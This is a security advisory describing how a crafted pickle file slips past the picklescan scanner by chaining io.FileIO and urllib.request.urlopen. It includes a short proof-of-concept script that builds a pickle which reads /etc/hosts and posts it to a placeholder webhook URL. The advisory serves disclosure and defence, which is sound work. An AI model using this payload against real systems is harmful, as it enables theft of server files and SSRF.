picklescan has Arbitrary file read using `io.FileIO`
GHSA-9726-w42j-3qjr
Published · Modified
Description
Summary
Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.
Details
The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:
io.FileIO: Opens local files without using builtins.open.
urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.
PoC
import pickle, io, urllib.request
class GetFile:
def __reduce__(self):
return (io.FileIO, ('/etc/hosts', 'r'))
class Exfiltrate:
def __reduce__(self):
return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))
with open("bypass_http.pkl", "wb") as f:
pickle.dump(Exfiltrate(), f)
Impact
- Arbitrary file read
Thanks for this library and your time. If you think picklescan is focused on detecting only RCE kind of vulnerabilities rather adding File IO, Http or any protocol based may cause lot of noise, feel free to close this issue.
References
- WEB https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr
- WEB https://github.com/mmaitre314/picklescan/pull/55
- WEB https://github.com/mmaitre314/picklescan/commit/a01c58d5dd7960db557b849817c0ab83ab111ef1
- PACKAGE https://github.com/mmaitre314/picklescan
- WEB https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35
Ready to move
Start Securing
Free, no credit card | First findings in minutes